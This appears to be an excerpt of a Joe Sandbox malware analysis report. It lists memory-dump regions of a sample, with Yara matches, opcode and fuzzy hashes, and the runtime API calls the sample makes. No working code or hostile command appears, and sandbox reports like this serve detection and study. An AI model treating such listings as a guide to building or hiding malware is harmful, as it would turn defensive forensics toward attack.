                                                    • Snapshot File: hcaresult_0_2_5fd0000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 62b742ce3b9aed386f6b13282664de31ea78280af6b1cf23a5e343f911db19df
                                                    • Instruction ID: 74ce6e998d3e949fb62bf14ccadaee64f9de0beceaaf0364c6630042a65c4d9c
                                                    • Opcode Fuzzy Hash: 62b742ce3b9aed386f6b13282664de31ea78280af6b1cf23a5e343f911db19df
                                                    • Instruction Fuzzy Hash: A6E1A2717402119FC708DF79C994B2AB7ABBF88350B154568D90ACB7A5DF38EC42CB91
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3272849307.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_610000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 53fd915c455bc613e875872949079b38185adfdf937e690afefee85b57ad4f6d
                                                    • Instruction ID: 7f7184c6db04d4af9ec584f3189cf3075bee8cadc75340f530c3e6bce01c9b96
                                                    • Opcode Fuzzy Hash: 53fd915c455bc613e875872949079b38185adfdf937e690afefee85b57ad4f6d
                                                    • Instruction Fuzzy Hash: 1AF182706087429FD308CF29C4946AAB7F2FF94304F188A2DE89587781D774EA95CBD6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3271943549.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3271943549.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3271943549.0000000000439000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 020392db844ceed98276714fd2150c2ad4a639f6bad3fb02a1d0621011a6745a
                                                    • Instruction ID: cc67e10771130af0a5279b37c8f7fa75a2653c997645fd1ae8a0b8309c7f2627
                                                    • Opcode Fuzzy Hash: 020392db844ceed98276714fd2150c2ad4a639f6bad3fb02a1d0621011a6745a
                                                    • Instruction Fuzzy Hash: 48E1D6306083514FC708CF28C99456ABBE2EFC5304F198A7EE8D68B386D779D94ACB55
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3272849307.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_610000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 020392db844ceed98276714fd2150c2ad4a639f6bad3fb02a1d0621011a6745a
                                                    • Instruction ID: 545b723429ee37d3ebc0f159727cd8e804097b2acf65bff3a5fb9213f089a5aa
                                                    • Opcode Fuzzy Hash: 020392db844ceed98276714fd2150c2ad4a639f6bad3fb02a1d0621011a6745a
                                                    • Instruction Fuzzy Hash: 7AE1D13060C3858FC308CF29C9945A9BBE3EFC5304F18896DE8D68B346DA75D98ACB51
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3278069850.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_60a0000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ff4fc6731ddac55acb1f068565a835dedca96b605ef5ed7de3f631a49a8b191e
                                                    • Instruction ID: 56e3ce3f157dab48545d81838a01c696fa68c31edf5e5f6a53e0e27634cc08f5
                                                    • Opcode Fuzzy Hash: ff4fc6731ddac55acb1f068565a835dedca96b605ef5ed7de3f631a49a8b191e
                                                    • Instruction Fuzzy Hash: D6C12C64BC03258FD688A6BD5D6072B188F9FCC780F14486D590ED77E9DDAC8D4283EA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3272849307.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_610000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a3fc5284134f86fd186721dcf95c44c202eff21e43d8ff3da1d4bdbd65ccf5f9
                                                    • Instruction ID: 73e013819c637bc2bd0303e65f648531ce33fafa5f72fc102976568dbee866db
                                                    • Opcode Fuzzy Hash: a3fc5284134f86fd186721dcf95c44c202eff21e43d8ff3da1d4bdbd65ccf5f9
                                                    • Instruction Fuzzy Hash: 29C191706083569FD308CF29C4846AAB7F2FF94300F188A2DE89587781D774EA95CBD2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3277864225.0000000005FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5fd0000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9824b151f99ed3f9e01fc8d0a5fc8e886835105db0e641957f6553969eeceaf4
                                                    • Instruction ID: 94a564207ff3dfb5ac5b604da8d31fb94c9e7ecd0266b2491a9abdcffe5a5f76
                                                    • Opcode Fuzzy Hash: 9824b151f99ed3f9e01fc8d0a5fc8e886835105db0e641957f6553969eeceaf4
                                                    • Instruction Fuzzy Hash: 00A1BE30B003059FC715EB79D894A2ABBA7EF85240B4884BDD946CB395DF38E805CBA1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3278069850.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_60a0000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dc32c75c3f41343a6c1b93e6894866726b06c199a33d2c13bb633f7644230d5d
                                                    • Instruction ID: 784abb0afc8bb08c156b1200330ac1aeac8e7df188e488f98079486fc7898727
                                                    • Opcode Fuzzy Hash: dc32c75c3f41343a6c1b93e6894866726b06c199a33d2c13bb633f7644230d5d
                                                    • Instruction Fuzzy Hash: FA712B64BC03298FD688A6BD4D6072F188F9FCC740F1549A9190ED77E9DC9C8D4683EA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3271943549.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3271943549.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3271943549.0000000000439000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 519d71d31dfe2b71d65c539f7253ce4d0ce1a0c509a5eaaf561cac07154b4855
                                                    • Instruction ID: 74c1b90a01db230de662c72faab58802bb742d928f34651097fec506a9751401
                                                    • Opcode Fuzzy Hash: 519d71d31dfe2b71d65c539f7253ce4d0ce1a0c509a5eaaf561cac07154b4855
                                                    • Instruction Fuzzy Hash: 15717072A9155347E39CCF5CECD17763713DBC5351F49C23ACA025B6EAC938A922C688
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3272849307.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_610000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 519d71d31dfe2b71d65c539f7253ce4d0ce1a0c509a5eaaf561cac07154b4855
                                                    • Instruction ID: 9fc5f91f00c550d809267e38b38a2fcf2711ab36c9d56da1ea51aa7b5b024fea
                                                    • Opcode Fuzzy Hash: 519d71d31dfe2b71d65c539f7253ce4d0ce1a0c509a5eaaf561cac07154b4855
                                                    • Instruction Fuzzy Hash: 9A714FB2A9155347E399CF5CECD17753713DBC9351F0DC279CA024B7AACA386922C688
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3271943549.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3271943549.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3271943549.0000000000439000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 56d4400f77c04dc4446d24fbb084ed78fa0beaad766ef6ff58d44a670f1be69a
                                                    • Instruction ID: e93c334361593eb17f37b37ed9e80cdb2c00b1b1e1af3e0e9a736190e966ddef
                                                    • Opcode Fuzzy Hash: 56d4400f77c04dc4446d24fbb084ed78fa0beaad766ef6ff58d44a670f1be69a
                                                    • Instruction Fuzzy Hash: 4A615E3266055747E391DF6DEEC47663762EBC9351F18C630CA008B6A6CB39B92297CC
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3272849307.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_610000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 56d4400f77c04dc4446d24fbb084ed78fa0beaad766ef6ff58d44a670f1be69a
                                                    • Instruction ID: 479fd24770dba1ce6e3265e8ceb5a1cbe72fbfa9a6ca6819c51703e96f5fb719
                                                    • Opcode Fuzzy Hash: 56d4400f77c04dc4446d24fbb084ed78fa0beaad766ef6ff58d44a670f1be69a
                                                    • Instruction Fuzzy Hash: 90614F3266055747E391CF6DEDC47A63763EB8D311F18C670CA008B666CB39A96297CC
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3271943549.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3271943549.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3271943549.0000000000439000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f84f8abda09efbfc4fc50908dec446613bf2f52d635c093d4d9c5e236f650133
                                                    • Instruction ID: 39afabd8a370e1aacf823bb5b0eb141e0e266d105c364ee31248ba7b153c19f0
                                                    • Opcode Fuzzy Hash: f84f8abda09efbfc4fc50908dec446613bf2f52d635c093d4d9c5e236f650133
                                                    • Instruction Fuzzy Hash: 2851F94400D7E18EC716873A44E0AA7BFD10FAB115F4E9ACDA5E90B2E3C159C288DB77
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3272849307.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_610000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f84f8abda09efbfc4fc50908dec446613bf2f52d635c093d4d9c5e236f650133
                                                    • Instruction ID: 8c64e2da91d81a602326a34605520b8f0c831aa6e2df9ce6d8b13b75428eeea0
                                                    • Opcode Fuzzy Hash: f84f8abda09efbfc4fc50908dec446613bf2f52d635c093d4d9c5e236f650133
                                                    • Instruction Fuzzy Hash: F651FA4400D7E18EC716873A44E0AA7BFD10FAB115F4E9ACDA5E90B2E3C159C288DB77
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3271943549.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3271943549.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3271943549.0000000000439000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5804b07f674ae3d268ec1438c7da71b35f3107e62f64f1f633515dfb68ee091a
                                                    • Instruction ID: cff114a85fcb8f5deb46d81d22c4208fa3965af46b01a687ebeadebabb5a60ab
                                                    • Opcode Fuzzy Hash: 5804b07f674ae3d268ec1438c7da71b35f3107e62f64f1f633515dfb68ee091a
                                                    • Instruction Fuzzy Hash: 9A31D8302052028BE738CE19C954BEBB3B5AFC0349F44883ED986A73C4DABDD945D795
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3272849307.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_610000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5804b07f674ae3d268ec1438c7da71b35f3107e62f64f1f633515dfb68ee091a
                                                    • Instruction ID: 5fa92ea53a437490be2d973af2935ea63afba22ee8824f767710cdc011723f81
                                                    • Opcode Fuzzy Hash: 5804b07f674ae3d268ec1438c7da71b35f3107e62f64f1f633515dfb68ee091a
                                                    • Instruction Fuzzy Hash: FB315E316043619BE738DA19C891BEBB3A2ABC0354F5CC92CD99787340E675ABC5C791
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3271943549.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3271943549.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3271943549.0000000000439000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9961543af999a1320c5b9d9b8c59a9b64f893fc8dbb42675723320a25693eab2
                                                    • Instruction ID: 40597224e526abc728bb10992f322fa75c91b34d76fbbe6bc80328d1c420bfc2
                                                    • Opcode Fuzzy Hash: 9961543af999a1320c5b9d9b8c59a9b64f893fc8dbb42675723320a25693eab2
                                                    • Instruction Fuzzy Hash: F321923170520247EB68C929C9547ABB3A5ABC0389F48853EC986A73C8DAB9E941D785
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3272849307.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_610000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9961543af999a1320c5b9d9b8c59a9b64f893fc8dbb42675723320a25693eab2
                                                    • Instruction ID: 909c114264f090415a1dd28ecc13f86aa2149b900278d72a9d7fd7ba7583b8de
                                                    • Opcode Fuzzy Hash: 9961543af999a1320c5b9d9b8c59a9b64f893fc8dbb42675723320a25693eab2
                                                    • Instruction Fuzzy Hash: 24215C3170426187EB38D929C8A17EBB3A3ABC0344F5CC52CCD9796794E675EB81C791
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3273309685.000000000068E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0068E000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_68e000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                    • Instruction ID: 8384ee6828db778190cb0de4464eba6ca7c916eae9ebcd268072d978709af9ec
                                                    • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                    • Instruction Fuzzy Hash: EE118E72340100AFE744EF55DC91EA673EAEB89320B298169EE04CB356D676EC02C760
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3272849307.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_610000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: da1566a2f6af9372ef5ff0064129cc8c7bd33331f23317b37220a35c5510ad97
                                                    • Instruction ID: fa756f02ff9fea7b70df81fbf9ff227063e8d8ff50de116363a10cee8272ad70
                                                    • Opcode Fuzzy Hash: da1566a2f6af9372ef5ff0064129cc8c7bd33331f23317b37220a35c5510ad97
                                                    • Instruction Fuzzy Hash: 41F0AF76A005049FEF21CFA4E805BEE73BAEF85315F0841A4D80AD7241D3B0A9828B50
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3277864225.0000000005FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5fd0000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj
                                                    • API String ID: 0-3774739348
                                                    • Opcode ID: 20bf29f9ae01816f768c25c784b8a99926a76f23eeadddc58bdc77288392dbd0
                                                    • Instruction ID: 19ad874010ea2aa7efed34edb78ce414ca849aca56d21441153a21dd177735e6
                                                    • Opcode Fuzzy Hash: 20bf29f9ae01816f768c25c784b8a99926a76f23eeadddc58bdc77288392dbd0
                                                    • Instruction Fuzzy Hash: A7D1C230740700AFD7167BA0EC51A6DE15BFF86B84B508438D1294F7BACF75AC198796
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3277864225.0000000005FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5fd0000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj
                                                    • API String ID: 0-3774739348
                                                    • Opcode ID: faaeb773e6fe39346fc70f465f6f51e729cdc4a8286e0043cff4b0cb7597ff8a
                                                    • Instruction ID: 5d82f06bdc80c9db27fb3d2ee2ec0ddb9fb095703ba227a5f73a8b38507ae680
                                                    • Opcode Fuzzy Hash: faaeb773e6fe39346fc70f465f6f51e729cdc4a8286e0043cff4b0cb7597ff8a
                                                    • Instruction Fuzzy Hash: 80D1C130740700AFD71A7BA0EC51A6DE25BFF86B84B508438D1294F7BACF75AC198796
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3277864225.0000000005FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5fd0000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj$Dhj
                                                    • API String ID: 0-3774739348
                                                    • Opcode ID: db33e8930c14063c0863e35b4139910fe28873a55f0f9e318bd94904cc45d2fc
                                                    • Instruction ID: 2c1aa867cce8782c7b1c1640617e72e03b6b9da4c7fbcbf3adf17699d440a5e9
                                                    • Opcode Fuzzy Hash: db33e8930c14063c0863e35b4139910fe28873a55f0f9e318bd94904cc45d2fc
                                                    • Instruction Fuzzy Hash: 27D1B130740700AFD71A7BA0EC51A6DE15BFF86B84B508438D1284F7BACF75AC198796
                                                    APIs
                                                    • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
                                                    • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,024F1908), ref: 004170C5
                                                    • MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
                                                    • _malloc.LIBCMT ref: 0041718A
                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
                                                    • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
                                                    • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
                                                    • _malloc.LIBCMT ref: 0041724C
                                                    • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
                                                    • __freea.LIBCMT ref: 004172A4
                                                    • __freea.LIBCMT ref: 004172AD
                                                    • ___ansicp.LIBCMT ref: 004172DE
                                                    • ___convertcp.LIBCMT ref: 00417309
                                                    • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
                                                    • _malloc.LIBCMT ref: 00417362
                                                    • _memset.LIBCMT ref: 00417384
                                                    • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
                                                    • ___convertcp.LIBCMT ref: 004173BA
                                                    • __freea.LIBCMT ref: 004173CF
                                                    • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3271943549.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3271943549.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3271943549.0000000000439000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
                                                    • String ID:
                                                    • API String ID: 3809854901-0
                                                    • Opcode ID: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
                                                    • Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
                                                    • Opcode Fuzzy Hash: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
                                                    • Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98
                                                    APIs
                                                    • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00627303
                                                    • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,00423620), ref: 00627315
                                                    • _malloc.LIBCMT ref: 006273DA
                                                    • _malloc.LIBCMT ref: 0062749C
                                                    • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 006274C7
                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 006274EA
                                                    • __freea.LIBCMT ref: 006274F4
                                                    • __freea.LIBCMT ref: 006274FD
                                                    • ___ansicp.LIBCMT ref: 0062752E
                                                    • ___convertcp.LIBCMT ref: 00627559
                                                    • _malloc.LIBCMT ref: 006275B2
                                                    • _memset.LIBCMT ref: 006275D4
                                                    • ___convertcp.LIBCMT ref: 0062760A
                                                    • __freea.LIBCMT ref: 0062761F
                                                    • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00627639
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3272849307.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_610000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: String__freea_malloc$___convertcp$ByteCharErrorLastMultiWide___ansicp_memset
                                                    • String ID:
                                                    • API String ID: 2918745354-0
                                                    • Opcode ID: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
                                                    • Instruction ID: c19c08e273685f66eda14478e849b7d81fc53cf4f787070cd16487a17946d5c5
                                                    • Opcode Fuzzy Hash: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
                                                    • Instruction Fuzzy Hash: 10B1AD7290492AAFDF219FA4EC80CEE7FB7EB08350B158129F915A2260D735CD91DF94
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00421320,0000000C,00620960,00000000,00000000,?,00000001,0061C216,0061B97C), ref: 00620837
                                                    • __crt_waiting_on_module_handle.LIBCMT ref: 00620842
                                                      • Part of subcall function 0061E9BA: Sleep.KERNEL32(000003E8,00000000,?,00620788,KERNEL32.DLL,?,006207D4,?,00000001,0061C216,0061B97C), ref: 0061E9C6
                                                      • Part of subcall function 0061E9BA: GetModuleHandleW.KERNEL32(00000001,?,00620788,KERNEL32.DLL,?,006207D4,?,00000001,0061C216,0061B97C), ref: 0061E9CF
                                                    • __lock.LIBCMT ref: 0062089D
                                                    • InterlockedIncrement.KERNEL32(?), ref: 006208AA
